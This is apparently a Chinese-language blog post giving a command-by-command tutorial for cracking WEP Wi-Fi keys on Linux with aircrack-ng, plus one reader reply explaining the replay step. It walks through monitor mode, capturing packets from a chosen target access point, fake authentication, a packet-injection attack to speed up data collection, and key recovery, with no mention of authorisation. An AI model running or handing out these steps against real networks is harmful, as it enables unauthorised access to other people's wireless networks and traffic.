Linux 使用 Aircrack-ng 破解 WEP

1. 安装 aircrack-ng,以 Arch Linux 为例:

sudo pacman -S aircrack-ng

2. 破解过程
a. 启动无线网卡的监控模式

sudo airmon-ng start wlan0

Tips:wlan0 是无线网络接口,具体名称可使用 ifconfig 命令查看。

b. 查看无线 AP 信息

sudo airodump-ng wlan0

Tips: 用来查看当前的无线 AP 信息,如 BSSID 和 频道等等。

c. 抓包

sudo airodump-ng -c 6 --bssid AP's MAC -w output --ivs wlan0

Tips: -c 后面的 6 是要破解的 AP 工作频道,–bissid 后面的 AP’s MAC 是要欲破解 AP 的 MAC 地址,-w 后面的 output 的是抓下来的数据包 DATA 保存的文件名。

d. 与 AP 建立虚拟连接

sudo aireplay-ng -1 0 -a AP's MAC -h My MAC wlan0

Tips: -h 后面的 My MAC 是自己的无线网卡的 MAC 地址,可使用 ifconfig 命令查看。

e. 进行攻击,加速收集 DATA

sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC wlan0

f. 破解
收集到一定量的 DATA 后(建议超过10000)即可执行下面的命令开发解密。

aircrack-ng output*

如不能解密成功则继续收集 DATA。

g. 结束
破解成功后关闭监听模式

sudo airmon-ng stop wlan0

Over!

7 thoughts on “Linux 使用 Aircrack-ng 破解 WEP”

    1. 不是的,在步骤 e 是需要收集到目标 AP 与其它客户端正常通信的数据包,然后再利用此数据包欺骗 AP,从而加速 DATA 的收录。如果一直收集不到目标 AP 的正常通信包是不能加速的。

Leave a Reply

Your email address will not be published. Required fields are marked *